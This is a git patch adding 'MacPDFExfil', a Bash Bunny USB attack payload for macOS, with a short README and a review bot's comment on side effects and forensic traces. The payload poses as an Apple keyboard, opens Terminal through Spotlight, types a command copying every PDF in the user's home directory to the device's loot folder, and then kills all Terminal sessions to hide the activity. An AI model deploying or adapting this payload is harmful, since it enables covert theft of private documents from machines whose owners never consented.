From 7534270a7a6bbeee21fa7b2163e3f157ccb1ab7b Mon Sep 17 00:00:00 2001
From: k1ul3ss
Date: Sun, 16 Apr 2017 00:53:49 -0500
Subject: [PATCH] Added MacPDFExfil payload (#186)
---
.../exfiltration/MacPDFExfil/README.md | 15 ++++++++++
.../exfiltration/MacPDFExfil/payload.txt | 29 +++++++++++++++++++
2 files changed, 44 insertions(+)
create mode 100644 payloads/library/exfiltration/MacPDFExfil/README.md
create mode 100644 payloads/library/exfiltration/MacPDFExfil/payload.txt
diff --git a/payloads/library/exfiltration/MacPDFExfil/README.md b/payloads/library/exfiltration/MacPDFExfil/README.md
new file mode 100644
index 00000000..4268875e
--- /dev/null
+++ b/payloads/library/exfiltration/MacPDFExfil/README.md
@@ -0,0 +1,15 @@
+# MacPDFExfil
+
+Author: k1ul3ss
+Version: Version 1.0
+Target: macOS
+
+## Description
+
+Mounts as storage and acts as HID. Backup PDF files to the BashBunny
+
+## Configuration
+
+Configured to copy all PDFs located in the users home directory to the BashBunnny
+
+## STATUS
\ No newline at end of file
diff --git a/payloads/library/exfiltration/MacPDFExfil/payload.txt b/payloads/library/exfiltration/MacPDFExfil/payload.txt
new file mode 100644
index 00000000..0c363a27
--- /dev/null
+++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt
@@ -0,0 +1,29 @@
+#!/bin/bash
+#
+# Title: MacPDFExfil
+# Author: k1ul3ss
+# Props: audibleblink
+# Version: 1.0
+# Category: Exfiltration
+# Target: macOS
+# Attackmodes: HID, Storage
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
+
+# device name
+dev_name="BashBunny"
+
+# loot directory
+lootdir="/Volumes/$dev_name/loot/"
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 3000
+# Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage.
+QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
+QUACK ENTER
+
+# sync the filesystem
+sync
\ No newline at end of file
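Review bot: The typed command in payload.txt ends with `killall Terminal`, which terminates every Terminal session of the logged-in user rather than only the window the payload opened, and neither the header comment nor the README (whose `## STATUS` section is empty) records that side effect. I would add a header line such as `# Side effects: closes all open Terminal sessions on the host` and fill in the STATUS section. The header could also record what a run leaves for responders to look for, as far as the visible lines show: a USB HID device enumerating with Apple's vendor ID (`VID_0X05AC`) together with a mass-storage volume the payload expects at `/Volumes/BashBunny`, and a Terminal process launched via Spotlight running `find ~ -name '*.pdf' -exec cp` into that volume's `loot/` directory.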